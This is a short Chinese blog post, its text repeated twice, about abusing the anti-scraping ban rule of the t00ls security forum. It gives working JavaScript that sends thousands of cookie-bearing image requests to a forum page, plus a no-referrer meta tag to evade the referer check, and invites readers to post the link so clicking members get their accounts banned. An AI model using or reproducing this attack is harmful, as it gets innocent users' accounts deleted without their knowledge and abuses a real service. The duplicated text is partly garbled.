看我如何玩t00ls(国内知名安全论坛)
N年不上土司 。今日登录进去发表一个帖子 然后长按F5 2秒左右居然被封号了。
最后得知土司开了 反采集策略。
于是开始分析:
如果发送的请求过快那么就会被封(被删号)
通过实验 分析得出反采集策略流程:
符合2个条件才能达到删号条件
1、利用Referer 判断来源
2、利用cookie判断会员是否处于登录状态
如果Referer来路正确 并且是会员登录状态 那么请求过快就会被删号!!
PS:经过测试 只要是Referer为空就好。。。。。
得到这2点,于是我又想到一个邪恶整人的思想。。利用JS来携带cookie 发送请求,我的意思是说 在土司发个帖子。点击这个链接。当点击这个链接之后。然后就被封号了。哈哈哈。。。。
JS代码:
(() => {
const concurrency = 100
const total = 10000
let count = 0
const onDone = () => {
count += 1
}
const timer = setInterval(() => {
if (count > total) return clearInterval(timer)
const img = new Image();
img.src = 'https://www.t00ls.net/articles-47911.html'
img.onerror = img.onload = onDone
}, 1000 / concurrency)
})()
最后发现失败。 原因是referrer 来源不是土司。
在HTML中 添加 <meta name="referrer" content="no-referrer">
这样发送请求的时候不会携带referrer
完整代码:
测试效果:打开链接之后2 3秒左右。
速度取决于你的网速。。
玩法:发帖 添加A标签 让人点击
最后得知土司开了 反采集策略。
于是开始分析:
如果发送的请求过快那么就会被封(被删号)
通过实验 分析得出反采集策略流程:
符合2个条件才能达到删号条件
1、利用Referer 判断来源
2、利用cookie判断会员是否处于登录状态
如果Referer来路正确 并且是会员登录状态 那么请求过快就会被删号!!
PS:经过测试 只要是Referer为空就好。。。。。
得到这2点,于是我又想到一个邪恶整人的思想。。利用JS来携带cookie 发送请求,我的意思是说 在土司发个帖子。点击这个链接。当点击这个链接之后。然后就被封号了。哈哈哈。。。。
JS代码:
(() => {
const concurrency = 100
const total = 10000
let count = 0
const onDone = () => {
count += 1
}
const timer = setInterval(() => {
if (count > total) return clearInterval(timer)
const img = new Image();
img.src = 'https://www.t00ls.net/articles-47911.html'
img.onerror = img.onload = onDone
}, 1000 / concurrency)
})()
最后发现失败。 原因是referrer 来源不是土司。
在HTML中 添加 <meta name="referrer" content="no-referrer">
这样发送请求的时候不会携带referrer
完整代码:
测试效果:打开链接之后2 3秒左右。
速度取决于你的网速。。
玩法:发帖 添加A标签 让人点击